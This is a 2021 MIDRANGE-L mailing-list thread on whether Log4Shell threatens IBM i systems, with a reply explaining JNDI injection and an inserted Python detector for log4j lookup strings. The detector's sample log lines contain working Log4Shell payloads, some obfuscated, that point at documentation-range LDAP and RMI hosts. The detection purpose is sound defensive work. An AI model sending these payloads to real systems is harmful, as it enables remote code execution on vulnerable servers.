Brad,

They don't need credentials because the malicious code runs in the same
context as the Java app with a vulnerable version of log4j.

The full vulnerability, older JVM + log4j2, is really bad as the
malicious actor gets to load & run his/her own code from a remote server.

As I understand it, with a newer JVM, it's not quite as bad, given that the
malicious actor has to find and misuse a local Java class; however, from
https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/:

References and object construction with factories are still supported,
just remote codebases are prohibited. Michael Stepankin in
https://www.veracode.com/blog/research/exploiting-jndi-injections-java describes
how the Apache XBean *BeanFactory* can be used in a returned Reference to
achieve code execution. This class has to be locally available on the
targeted system, however, it is for example included in Apache Tomcat. If
your application runs in Tomcat, bad luck.
https://github.com/veracode-research/rogue-jndi also has another vector
for WebSphere.


Now I am not a Java guru, nor have I really spent any time working on how
to maliciously work an IBM i... so I can't give you a step-by-step or a hard
example. But I can say that my repo on our dev box with code for running
Apache Camel & Kafka on the IBM i popped up on our security team's radar.

Luckily, most malicious actors concentrate on Windows/Linux. But I'm
willing to bet some of them are familiar with the IBM i.

Charles
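
To make the "no credentials needed" point concrete: an affected log4j 2 resolves `${...}` lookups inside the message text it is asked to log, so any string a remote caller can get logged (a User-Agent header, a query parameter, a form field) is attacker input, and `${jndi:ldap://host/x}` in it is enough to make the JVM reach out. The following is an added example, not code from this thread or from any of the linked posts: a small Python detector that scans web access-log lines for such lookups. It goes a step beyond the thread by first undoing the nesting tricks seen in the wild (`${lower:j}`, `${upper:...}` and the `${something:-default}` fallback), since a plain search for `${jndi:` misses those. The log lines, IP addresses and URLs are constructed for the example; the set of obfuscation rules handled is an assumption about common payload shapes, not a complete grammar of log4j lookups.

```python
"""Detect Log4Shell-style lookup strings in logged input.

Added example: scans access-log lines for ${jndi:...} lookups after
undoing the nesting tricks attackers use to dodge naive matching.
"""
import re

# Constructed sample lines for this example. Addresses are from the
# RFC 5737 documentation ranges, not real hosts.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [14/Dec/2021:13:38:01 -0600] "GET / HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0"',
    '10.0.0.7 - - [14/Dec/2021:13:38:02 -0600] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.8 - - [14/Dec/2021:13:38:03 -0600] "GET /login HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}dap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [14/Dec/2021:13:38:04 -0600] "GET /api HTTP/1.1" 200 512 "-" '
    '"${${env:NOPE:-j}ndi:rmi://203.0.113.11:1099/x}"',
    '10.0.0.10 - - [14/Dec/2021:13:38:05 -0600] '
    '"GET /price?item=${sys:java.version} HTTP/1.1" 200 512 "-" "curl/7.79"',
]

# An innermost lookup: ${ ... } whose body contains no further $, { or }.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")

# ${jndi:<scheme>:...} after normalisation; the scheme is captured.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.I)

# Any other ${name:...} lookup left standing (sys:, env:, date: ...).
LOOKUP = re.compile(r"\$\{\s*[a-z]+\s*:", re.I)


def _resolve(m):
    """Resolve one innermost lookup the way log4j's StrSubstitutor would,
    for the subset of lookups attackers use as obfuscation (assumption:
    lower, upper and the ':-' default-value fallback)."""
    body = m.group(1)
    kind, sep, arg = body.partition(":")
    if sep and kind.strip().lower() == "jndi":
        return m.group(0)  # keep it intact for the detector
    if sep and kind.strip().lower() == "lower":
        return arg.lower()
    if sep and kind.strip().lower() == "upper":
        return arg.upper()
    if ":-" in body:
        # ${env:NOPE:-j} or ${::-j}: an undefined lookup yields its default
        return body.split(":-", 1)[1]
    return m.group(0)  # unknown lookup: leave as-is, LOOKUP will flag it


def deobfuscate(text, max_rounds=50):
    """Repeatedly resolve innermost lookups until the string is stable."""
    for _ in range(max_rounds):
        new = INNERMOST.sub(_resolve, text)
        if new == text:
            return text
        text = new
    return text


def classify(line):
    """Return (verdict, scheme, normalised_line).

    verdict is 'jndi' for a JNDI lookup (scheme = ldap/rmi/dns/...),
    'lookup' for any other surviving ${name:...} lookup, else 'clean'.
    """
    norm = deobfuscate(line)
    m = JNDI.search(norm)
    if m:
        return ("jndi", m.group(1).lower(), norm)
    if LOOKUP.search(norm):
        return ("lookup", None, norm)
    return ("clean", None, norm)


def scan(lines):
    """Return (index, verdict, scheme) for every non-clean line."""
    hits = []
    for i, line in enumerate(lines):
        verdict, scheme, _ = classify(line)
        if verdict != "clean":
            hits.append((i, verdict, scheme))
    return hits


if __name__ == "__main__":
    for idx, verdict, scheme in scan(SAMPLE_LOG_LINES):
        print(f"line {idx}: {verdict} {scheme or ''} -> "
              f"{classify(SAMPLE_LOG_LINES[idx])[2]}")
```

This works on already URL-decoded text, so feed it the same string the application would have passed to the logger, and check every logged field, not just User-Agent. A hit only shows an attempt: whether it succeeded depends on the log4j version and, as the quoted post says, on which factory classes happen to sit on the classpath, so pair this with a check for unexpected outbound LDAP/RMI connections from the JVM host.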


On Tue, Dec 14, 2021 at 1:38 PM Brad Stone <bvstone@xxxxxxxxx> wrote:

Thanks for clipping this from my post:

Not a hypothetical.. real world. Maybe if you found it on your system..
step us through how someone could cause harm without having credentials to
your system.

Thanks..... maybe there will be another TP shortage because of this...

On Tue, Dec 14, 2021 at 12:50 PM Jack Woehr via MIDRANGE-L <
midrange-l@xxxxxxxxxxxxxxxxxx> wrote:

On Tue, Dec 14, 2021 at 11:40 AM Brad Stone <bvstone@xxxxxxxxx> wrote:

Anyone care to share a real world example of how this would hurt someone
on the IBM i? From what I understand it requires a lot of variables... one
being that the attacker needs to be able to inject commands into the
logger.

https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j

--
Jack Woehr, IBM Champion 2021
<https://www.youracclaim.com/badges/528d23d6-087f-4698-8d17-d59688106ac4/public_url>
Absolute Performance, Inc.
12303 Airport Way, Suite 100
Broomfield, CO 80021

--
This is the Midrange Systems Technical Discussion (MIDRANGE-L) mailing
list
To post a message email: MIDRANGE-L@xxxxxxxxxxxxxxxxxx
To subscribe, unsubscribe, or change list options,
visit: https://lists.midrange.com/mailman/listinfo/midrange-l
or email: MIDRANGE-L-request@xxxxxxxxxxxxxxxxxx
Before posting, please take a moment to review the archives
at https://archive.midrange.com/midrange-l.

Please contact support@xxxxxxxxxxxxxxxxxxxx for any subscription related
questions.

Help support midrange.com by shopping at amazon.com with our affiliate
link: https://amazon.midrange.com


This mailing list archive is Copyright 1997-2022 by midrange.com and David Gibbs as a compilation work. Use of the archive is restricted to research of a business or technical nature. Any other uses are prohibited. Full details are available on our policy page. If you have questions about this, please contact [javascript protected email address].